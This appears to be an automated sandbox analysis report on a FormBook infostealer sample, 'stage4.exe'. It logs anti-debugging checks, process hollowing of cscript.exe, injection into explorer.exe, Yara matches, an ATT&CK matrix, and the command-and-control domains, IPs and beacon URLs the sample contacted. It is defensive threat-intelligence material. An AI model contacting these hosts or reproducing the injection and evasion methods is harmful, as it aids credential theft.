Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554B8D0 mov eax, dword ptr fs:[00000030h]	22_2_0554B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0554B8D0 mov eax, dword ptr fs:[00000030h]	22_2_0554B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B58EC mov eax, dword ptr fs:[00000030h]	22_2_054B58EC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B9080 mov eax, dword ptr fs:[00000030h]	22_2_054B9080
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05533884 mov eax, dword ptr fs:[00000030h]	22_2_05533884
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05533884 mov eax, dword ptr fs:[00000030h]	22_2_05533884
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F90AF mov eax, dword ptr fs:[00000030h]	22_2_054F90AF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E20A0 mov eax, dword ptr fs:[00000030h]	22_2_054E20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E20A0 mov eax, dword ptr fs:[00000030h]	22_2_054E20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E20A0 mov eax, dword ptr fs:[00000030h]	22_2_054E20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E20A0 mov eax, dword ptr fs:[00000030h]	22_2_054E20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E20A0 mov eax, dword ptr fs:[00000030h]	22_2_054E20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E20A0 mov eax, dword ptr fs:[00000030h]	22_2_054E20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EF0BF mov ecx, dword ptr fs:[00000030h]	22_2_054EF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EF0BF mov eax, dword ptr fs:[00000030h]	22_2_054EF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EF0BF mov eax, dword ptr fs:[00000030h]	22_2_054EF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05588B58 mov eax, dword ptr fs:[00000030h]	22_2_05588B58
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BDB40 mov eax, dword ptr fs:[00000030h]	22_2_054BDB40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BF358 mov eax, dword ptr fs:[00000030h]	22_2_054BF358
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BDB60 mov ecx, dword ptr fs:[00000030h]	22_2_054BDB60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E3B7A mov eax, dword ptr fs:[00000030h]	22_2_054E3B7A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E3B7A mov eax, dword ptr fs:[00000030h]	22_2_054E3B7A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557131B mov eax, dword ptr fs:[00000030h]	22_2_0557131B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055353CA mov eax, dword ptr fs:[00000030h]	22_2_055353CA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_055353CA mov eax, dword ptr fs:[00000030h]	22_2_055353CA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054DDBE9 mov eax, dword ptr fs:[00000030h]	22_2_054DDBE9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E03E2 mov eax, dword ptr fs:[00000030h]	22_2_054E03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E03E2 mov eax, dword ptr fs:[00000030h]	22_2_054E03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E03E2 mov eax, dword ptr fs:[00000030h]	22_2_054E03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E03E2 mov eax, dword ptr fs:[00000030h]	22_2_054E03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E03E2 mov eax, dword ptr fs:[00000030h]	22_2_054E03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E03E2 mov eax, dword ptr fs:[00000030h]	22_2_054E03E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C1B8F mov eax, dword ptr fs:[00000030h]	22_2_054C1B8F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C1B8F mov eax, dword ptr fs:[00000030h]	22_2_054C1B8F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0556D380 mov ecx, dword ptr fs:[00000030h]	22_2_0556D380
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E2397 mov eax, dword ptr fs:[00000030h]	22_2_054E2397
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557138A mov eax, dword ptr fs:[00000030h]	22_2_0557138A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EB390 mov eax, dword ptr fs:[00000030h]	22_2_054EB390
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E4BAD mov eax, dword ptr fs:[00000030h]	22_2_054E4BAD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E4BAD mov eax, dword ptr fs:[00000030h]	22_2_054E4BAD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E4BAD mov eax, dword ptr fs:[00000030h]	22_2_054E4BAD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05585BA5 mov eax, dword ptr fs:[00000030h]	22_2_05585BA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557EA55 mov eax, dword ptr fs:[00000030h]	22_2_0557EA55
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05544257 mov eax, dword ptr fs:[00000030h]	22_2_05544257
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B9240 mov eax, dword ptr fs:[00000030h]	22_2_054B9240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B9240 mov eax, dword ptr fs:[00000030h]	22_2_054B9240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B9240 mov eax, dword ptr fs:[00000030h]	22_2_054B9240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B9240 mov eax, dword ptr fs:[00000030h]	22_2_054B9240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F927A mov eax, dword ptr fs:[00000030h]	22_2_054F927A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0556B260 mov eax, dword ptr fs:[00000030h]	22_2_0556B260
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0556B260 mov eax, dword ptr fs:[00000030h]	22_2_0556B260
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_05588A62 mov eax, dword ptr fs:[00000030h]	22_2_05588A62
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557AA16 mov eax, dword ptr fs:[00000030h]	22_2_0557AA16
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0557AA16 mov eax, dword ptr fs:[00000030h]	22_2_0557AA16
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054C8A0A mov eax, dword ptr fs:[00000030h]	22_2_054C8A0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054D3A1C mov eax, dword ptr fs:[00000030h]	22_2_054D3A1C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B5210 mov eax, dword ptr fs:[00000030h]	22_2_054B5210
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B5210 mov ecx, dword ptr fs:[00000030h]	22_2_054B5210
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B5210 mov eax, dword ptr fs:[00000030h]	22_2_054B5210
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B5210 mov eax, dword ptr fs:[00000030h]	22_2_054B5210
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BAA16 mov eax, dword ptr fs:[00000030h]	22_2_054BAA16
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054BAA16 mov eax, dword ptr fs:[00000030h]	22_2_054BAA16
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F4A2C mov eax, dword ptr fs:[00000030h]	22_2_054F4A2C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054F4A2C mov eax, dword ptr fs:[00000030h]	22_2_054F4A2C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E2ACB mov eax, dword ptr fs:[00000030h]	22_2_054E2ACB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054E2AE4 mov eax, dword ptr fs:[00000030h]	22_2_054E2AE4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054ED294 mov eax, dword ptr fs:[00000030h]	22_2_054ED294
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054ED294 mov eax, dword ptr fs:[00000030h]	22_2_054ED294
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B52A5 mov eax, dword ptr fs:[00000030h]	22_2_054B52A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B52A5 mov eax, dword ptr fs:[00000030h]	22_2_054B52A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B52A5 mov eax, dword ptr fs:[00000030h]	22_2_054B52A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B52A5 mov eax, dword ptr fs:[00000030h]	22_2_054B52A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054B52A5 mov eax, dword ptr fs:[00000030h]	22_2_054B52A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CAAB0 mov eax, dword ptr fs:[00000030h]	22_2_054CAAB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054CAAB0 mov eax, dword ptr fs:[00000030h]	22_2_054CAAB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_054EFAB0 mov eax, dword ptr fs:[00000030h]	22_2_054EFAB0

Source: C:\Users\user\Desktop\stage4.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\stage4.exe

Code function: 0_2_01209B30 LdrLoadDll,

0_2_01209B30

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 88.99.22.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 109.234.160.63 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.theeppunday.com
Source: C:\Windows\explorer.exe	Domain query: www.egregore.club
Source: C:\Windows\explorer.exe	Domain query: www.dartsearchengine.com
Source: C:\Windows\explorer.exe	Domain query: www.feetlover.online
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\stage4.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1190000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\stage4.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\stage4.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\stage4.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\stage4.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: unknown protection: read write	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\stage4.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\stage4.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\user\Desktop\stage4.exe	Thread register set: target process: 5700	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 5700	Jump to behavior

Source: explorer.exe, 0000000F.00000000.356384580.00000000010D0000.00000002.00020000.sdmp, cscript.exe, 00000016.00000002.525509045.0000000003D40000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000001.00000000.302095490.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.356384580.00000000010D0000.00000002.00020000.sdmp, cscript.exe, 00000016.00000002.525509045.0000000003D40000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.292183209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.356384580.00000000010D0000.00000002.00020000.sdmp, cscript.exe, 00000016.00000002.525509045.0000000003D40000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.292183209.0000000001640000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000001.00000000.271337838.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000001.00000000.292183209.0000000001640000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000001.00000000.292183209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.317170263.00000000010D0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection52	Masquerading1	Input Capture1	Query Registry1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery131	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection52	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information4	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing2	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
stage4.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
www.feetlover.online	0%	Virustotal		Browse
dartsearchengine.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.gconsultingfirm.com/n8rn/?DFNPQJ=NdSdCS1so+jBOhKbX6Hl5r/uB2055iwTMCcKjDuiSwVFzL3wqZseOva8MEOaJLNdbnoX&Mf3=f880irxXZ4UDtxoP	0%	Avira URL Cloud	safe
www.mgav26.xyz/n8rn/	100%	Avira URL Cloud	phishing
http://www.feetlover.online/n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP	0%	Avira URL Cloud	safe
http://crl.v	0%	URL Reputation	safe
http://ns.adobe.cm/x	0%	Avira URL Cloud	safe
http://www.egregore.club/n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP	100%	Avira URL Cloud	phishing
http://www.dartsearchengine.com/n8rn/?DFNPQJ=h1fp3Hda9mAZkqRDMBzhuAsSSpfRTgMN3yh/hpwpAz6PQ27xv5wLBHD9XtakgWKnfsj5&Mf3=f880irxXZ4UDtxoP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.phillystore.net	192.200.108.3	true	true		unknown
www.feetlover.online	88.99.22.5	true	true	0%, Virustotal, Browse	unknown
dartsearchengine.com	34.102.136.180	true	false	0%, Virustotal, Browse	unknown
ragworkhouse.com	168.119.175.0	true	true		unknown
gconsultingfirm.com	34.102.136.180	true	false		unknown
td-balancer-db4-63-96.wixdns.net	185.230.63.96	true	false		unknown
www.mgav26.xyz	45.128.51.66	true	true		unknown
egregore.club	109.234.160.63	true	true		unknown
www.theeppunday.com	unknown	unknown	true		unknown
www.egregore.club	unknown	unknown	true		unknown
www.zenholisticstores.com	unknown	unknown	true		unknown
www.gconsultingfirm.com	unknown	unknown	true		unknown
www.security-paiemet.com	unknown	unknown	true		unknown
www.ragworkhouse.com	unknown	unknown	true		unknown
www.dartsearchengine.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.gconsultingfirm.com/n8rn/?DFNPQJ=NdSdCS1so+jBOhKbX6Hl5r/uB2055iwTMCcKjDuiSwVFzL3wqZseOva8MEOaJLNdbnoX&Mf3=f880irxXZ4UDtxoP	false	Avira URL Cloud: safe	unknown
www.mgav26.xyz/n8rn/	true	Avira URL Cloud: phishing	low
http://www.feetlover.online/n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP	true	Avira URL Cloud: safe	unknown
http://www.egregore.club/n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP	true	Avira URL Cloud: phishing	unknown
http://www.dartsearchengine.com/n8rn/?DFNPQJ=h1fp3Hda9mAZkqRDMBzhuAsSSpfRTgMN3yh/hpwpAz6PQ27xv5wLBHD9XtakgWKnfsj5&Mf3=f880irxXZ4UDtxoP	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.v	explorer.exe, 0000000F.00000003.349908622.0000000008844000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.366683920.0000000008844000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ns.adobe.cm/x	explorer.exe, 0000000F.00000000.317525640.0000000002BCB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
88.99.22.5	www.feetlover.online	Germany	24940	HETZNER-ASDE	true
109.234.160.63	egregore.club	France	50474	O2SWITCHFR	true
34.102.136.180	dartsearchengine.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	526334
Start date:	22.11.2021
Start time:	14:39:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	stage4.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/0@13/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 64.1% (good quality ratio 57.9%) Quality average: 71% Quality standard deviation: 32.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 50 Number of non-executed functions: 139
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115 Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:41:06	API Interceptor	626x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
88.99.22.5	AWB_SHIPPING DOCS.exe	Get hash	malicious	Browse	www.helpcloud.xyz/n8ds/?v4VDH=WHU8k4m&9rJT=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.mgav26.xyz	file0_stage3.dll	Get hash	malicious	Browse	45.128.51.66
td-balancer-db4-63-96.wixdns.net	LjqCr7g3bU.exe	Get hash	malicious	Browse	185.230.63.96
td-balancer-db4-63-96.wixdns.net	nFzJnfmTNh.exe	Get hash	malicious	Browse	185.230.63.96

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	HP7DYSoP6M.exe	Get hash	malicious	Browse	95.216.4.252
	yRqB5VANT3.exe	Get hash	malicious	Browse	95.216.4.252
	ufLqo90ySs.exe	Get hash	malicious	Browse	5.9.162.45
	1Fu7t9XR6E.exe	Get hash	malicious	Browse	95.216.4.252
	zMvP34LhcZ.exe	Get hash	malicious	Browse	5.9.162.45
	RFQ_quotation 00091 2021_Nov 22.xlsx.exe	Get hash	malicious	Browse	95.217.127.135
	1711.doc	Get hash	malicious	Browse	78.47.204.80
	g2ZhDilVO3	Get hash	malicious	Browse	135.181.142.133
	6GFcInUHLP.exe	Get hash	malicious	Browse	116.202.110.68
	Setup.exe	Get hash	malicious	Browse	188.34.188.23
	3XVTeL2yOE	Get hash	malicious	Browse	95.217.66.161
	6wV8uoO6lW.exe	Get hash	malicious	Browse	95.216.4.252
	L9s7zh4pKD.exe	Get hash	malicious	Browse	95.216.4.252
	qGwn1hxOmZ.exe	Get hash	malicious	Browse	95.216.4.252
	gIT7daOBPt.exe	Get hash	malicious	Browse	95.216.4.252
	f4gxrcTDkV.exe	Get hash	malicious	Browse	5.9.162.45
	SOO6hKZ7M0.exe	Get hash	malicious	Browse	5.9.162.45
	SOO6hKZ7M0.exe	Get hash	malicious	Browse	5.9.162.45
	f4gxrcTDkV.exe	Get hash	malicious	Browse	5.9.162.45
	pQscpg84Lh.exe	Get hash	malicious	Browse	5.9.162.45
O2SWITCHFR	payment.exe	Get hash	malicious	Browse	109.234.164.201
	Order Information.exe	Get hash	malicious	Browse	109.234.164.202
	Swift copy.exe	Get hash	malicious	Browse	109.234.160.164
	ENQUIRYSMRT119862021-ERW PIPES.pdf.exe	Get hash	malicious	Browse	185.246.46.93
	Unpaid Invoice.exe	Get hash	malicious	Browse	109.234.162.39
	SOA.exe	Get hash	malicious	Browse	109.234.162.39
	Payment Confirmation.exe	Get hash	malicious	Browse	109.234.162.39
	DOC040821.exe	Get hash	malicious	Browse	109.234.162.39
	2B0CsHzr8o.exe	Get hash	malicious	Browse	109.234.164.66
	PO-RFQ # 097663899 pdf .exe	Get hash	malicious	Browse	109.234.161.109
	ORDER#AP06-4113_APRIL FIRST ORDER_39202202-4014-9300202933.exe	Get hash	malicious	Browse	109.234.162.40
	sample.exe	Get hash	malicious	Browse	109.234.164.49
	SWIFT COPY_pdf.exe	Get hash	malicious	Browse	109.234.164.66
	FS1766.exe	Get hash	malicious	Browse	109.234.162.39
	Invoice-0898764_pdf.exe	Get hash	malicious	Browse	109.234.162.202
	ffOWE185KP.exe	Get hash	malicious	Browse	109.234.162.40
